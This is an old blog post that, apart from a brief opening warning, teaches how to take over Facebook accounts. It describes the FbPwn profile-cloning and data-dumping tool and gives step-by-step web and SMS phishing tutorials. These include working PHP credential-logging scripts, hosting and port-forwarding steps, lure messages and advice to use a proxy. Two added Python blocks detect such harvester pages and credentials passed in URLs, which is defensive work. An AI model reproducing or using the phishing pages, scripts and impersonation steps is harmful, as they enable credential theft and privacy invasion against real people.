Tuesday, 16 October 2012

FB Profile hacking



Friends, if you get a friend request from a stranger on Facebook, don't accept it. Even if you know the person, please verify whether the profile is real or not. A new hacking tool is available that will send friend requests to you. If you accept, it can steal all your info, photos and friend list. Think twice before accepting an invitation.
FbPwn: A cross-platform, Java-based Facebook profile dumper that sends friend requests to a list of Facebook profiles and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information, photos and friend list to a local folder.


Usage

A typical scenario is to gather the information from a user profile. The plugins are just a series of normal operations on FB, automated to increase the chance of you getting the info.

Typically, you first create a new blank account for the purpose of the test. Then the friending plugin works first, by adding all the friends of the victim (to have some common friends). Then the cloning plugin asks you to choose one of the victim's friends. The cloning plugin clones only the display picture and the display name of the chosen friend of the victim and sets them on the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls, waiting for the friend to accept. As soon as the victim accepts the friend request, the dumper starts to save all accessible HTML pages (info, images, tags, etc.) for offline examination.

After a few minutes, the victim will probably unfriend the fake account once he/she figures out it's a fake, but by then it's probably too late!


Modules Description:
All modules work on a selected profile URL (we'll call him bob), using a valid authenticated account (we'll call him mallory).

FBPwn modules are:

- AddVictimFriends: Request to add some or all friends of bob to increase the chance of bob accepting any future requests, after he finds that you have common friends.

- ProfileCloner: A list of all bob's friends is displayed, and you choose one of them (we'll call him andy). FBPwn will change mallory's display picture and basic info to match andy's. This increases the chance that bob accepts requests from mallory, as he thinks he is accepting from andy. Eventually bob will realize this is not andy's account, but it would probably be too late, as all his info is already saved for offline checking by mallory.

- CheckFriendRequest: Checks if mallory is already a friend of bob, and if so just ends execution. If not, the module tries to add bob as a friend and polls, waiting for him to accept. The module will not stop executing until the friend request is accepted.

- DumpFriends: Accessible friends of bob are saved for offline viewing. The output of the module depends on other modules; if mallory is not a friend of bob yet, the data might not be accessible and nothing will be dumped.

- DumpImages: Accessible images (tagged and albums) are saved for offline viewing. The same limitations as DumpFriends apply.

- DumpInfo: Accessible basic info is saved for offline viewing. The same limitations as DumpFriends apply.

Download Link : http://code.google.com/p/fbpwn/downloads/list

Hack fb account by phishing

HOW TO DO PHISHING ??

It's done in 2 phases

phase 1: creating a fake website login page.

phase 2: uploading our pages to web hosting sites and sending the fake login page link to your beloved ones

step by step guide to hack facebook :

step 1: go to www.facebook.com
right click and click view page source

step 2: copy all the code by pressing (ctrl+a), paste it in a notepad

step 3: Now press (ctrl+f), search for "action =" in that code

step 4: change action = "1.php"
(remove old link and keep 1.php instead of facebook link)

step 5: save notepad as index.html

step 6: copy the below code in another notepad and save as "1.php"

code :

<?php
header("Location: https://accounts.google.com/ ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Note: this will redirect your fake facebook page to the original gmail page after your enemy gets phished

step 7: now upload them in any webhosting site.

few webhosting sites :

http://x10hosting.com/
http://www.110mb.com/
http://www.doteasy.com/
http://www.freehostia.com/
http://www.awardspace.com/
http://www.000webhost.com/

step 8: after creating an account, upload our files index.html and 1.php

now send the fake login page link to the person whom you want to hack
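
From the hosting side, the two files described above leave a recognisable static footprint. The following added example (not part of the original post; the sample file contents and the names `collect.php`, `out.txt` and `example.org` are constructed placeholders) flags a PHP script that loops over request data, appends it to a file and redirects the visitor elsewhere, and a saved login page whose form posts to a target outside the brand's domain.

```python
import re

# Constructed sample: the shape of the logger script shown above, with
# placeholder names (out.txt and example.org are made up).
SAMPLE_PHP = '''<?php
header("Location: https://example.org/");
$h = fopen("out.txt", "a");
foreach ($_POST as $k => $v) { fwrite($h, $k . "=" . $v . "\\r\\n"); }
fclose($h);
exit;
?>'''

# Constructed sample: a saved login page whose form target was rewritten.
SAMPLE_HTML = '''<title>Log in to Facebook</title>
<form method="post" action="collect.php">
<input name="email"><input type="password" name="pass"></form>'''

PHP_RULES = {
    "iterates_request": re.compile(r"foreach\s*\(\s*\$_(POST|GET|REQUEST)\b", re.I),
    "append_to_file": re.compile(r"fopen\s*\([^)]*,\s*['\"]a\+?b?['\"]\s*\)", re.I),
    "writes_file": re.compile(r"\b(fwrite|fputs|file_put_contents)\s*\(", re.I),
    "redirects_away": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
}

def php_indicators(source):
    """Names of the harvester traits present in a PHP source string."""
    return sorted(name for name, rx in PHP_RULES.items() if rx.search(source))

def is_credential_logger(source):
    """Flag only when request data is looped, stored and the visitor bounced."""
    return len(php_indicators(source)) == len(PHP_RULES)

def suspicious_login_form(html, brand="facebook"):
    """True when a brand-titled page sends a password field off the brand's domain."""
    has_password = re.search(r"<input[^>]+type=['\"]?password", html, re.I)
    action = re.search(r"<form[^>]*\baction\s*=\s*['\"]?([^'\"\s>]+)", html, re.I)
    if not (has_password and action and brand in html.lower()):
        return False
    target = action.group(1)
    # On a third-party host, a relative target keeps the credentials on that host.
    m = re.match(r"https?://([^/]+)", target, re.I)
    if m is None:
        return True
    host = m.group(1).lower().split(":")[0]
    return not (host == brand + ".com" or host.endswith("." + brand + ".com"))
```
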

SMS Phishing

What happens?
The victim receives an SMS on his mobile, apparently from Facebook, asking him to try out the new version of Facebook. A link is provided in the SMS. The victim opens the link and sees the Facebook login page. He logs in and it shows that the username/password is wrong. He gets phished...

To proceed, you need a web server running on your computer connected to the internet, and the mobile number of the victim.

Process:

SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com/ and copy the source code. Place it in your web server's public html folder with ".htm" as the extension. Open this html file in notepad and go to the form tag. In it, change the form method from POST to GET. Change the form action value to write.php (you can change the name if you want). Rename the file to "index.htm". Create another file and name it "write.php". Open write.php, copy the following content into it and save it.

Code:

<?php
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");
$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Also create another file, pswd.txt, and leave it as it is. This is the file where our usernames and passwords get stored.
You can store these files in any directory under public html. Remember to name the directory something like facebook or similar.
Now start the server.

CHECKING IF OUR PHISHING PAGE IS WORKING.
Go to cmyip.com to find your IP address. Paste this IP address in the address bar. You should see your phishing page or your default index.htm (if the files are stored in a directory under public html). If not, the following may be the reasons for it:
1. You may be behind a router. So, you need to open the router's settings and enable port forwarding to your machine.
2. Your server may be configured not to allow any outside connections. So, check the access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files are stored. For example, my files are in /smsphish under public html. So, I'll navigate to...
http://myipaddress/smsphish/
There you can see the fake login of facebook. You can enter any fake stuff in the username and password fields. Press enter. It should redirect you to the actual facebook mobile site. Now, open our pswd.txt file and see if the details we entered are logged there. If they are, our work is mostly done. If they are not, check that you have made the necessary changes in index.htm and that write.php has not been tampered with.
Now nearly 90% work is done. We move to the last step...

SENDING THE SMS.
Now you have to find free SMS sites which do not require registration. These sites use their own number for sending messages. You can find many such sites. One word: Google. Now here come our social engineering techniques. Just type a message like "Experience the brand new, more secure version of facebook, simply follow the link,.. blah blah" and give the link to our phishing page. A sample message would look like this.

Quote
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.

You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (using a proxy is recommended) If he opens the message and the link, he will see the normal facebook mobile login, and if he enters the correct details, our phishing worked! Just keep watch on pswd.txt for their details!
Note: Be careful when running server!
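
Because the form is switched from POST to GET, the submitted credentials travel in the URL and appear in any proxy or gateway log on the path. An added example, not from the original post, that finds such requests in a constructed log; the log format and the form field names are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines: "<client> <method> <url> <status>".
# Addresses are from documentation ranges; credentials are dummies.
SAMPLE_LOG = """\
10.0.0.5 GET http://203.0.113.7/facebook/ 200
10.0.0.5 GET http://203.0.113.7/facebook/write.php?email=a%40example.com&pass=dummy 302
10.0.0.8 GET https://m.facebook.com/login.php?refid=9 200
10.0.0.9 GET http://shop.example.net/search?q=pass 200
"""

# Assumed field names for the login form; adjust to the form being protected.
ID_FIELDS = {"email", "user", "username", "login"}
SECRET_FIELDS = {"pass", "password", "passwd", "pwd"}
BRAND_DOMAIN = "facebook.com"

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def on_brand(host):
    return host == BRAND_DOMAIN or host.endswith("." + BRAND_DOMAIN)

def findings(log_text):
    """Return (client, host, reasons) per off-brand GET carrying login fields; values are never copied."""
    out = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1] != "GET":
            continue
        client, _, url, _ = parts
        u = urlsplit(url)
        host = (u.hostname or "").lower()
        params = {k.lower() for k in parse_qs(u.query, keep_blank_values=True)}
        if not (params & ID_FIELDS and params & SECRET_FIELDS) or on_brand(host):
            continue
        reasons = ["credentials_in_query"]
        if is_ip_literal(host):
            reasons.append("ip_literal_host")
        if u.scheme != "https":
            reasons.append("cleartext_http")
        if BRAND_DOMAIN.split(".")[0] in u.path.lower():
            reasons.append("brand_in_path")
        out.append((client, host, reasons))
    return out
```
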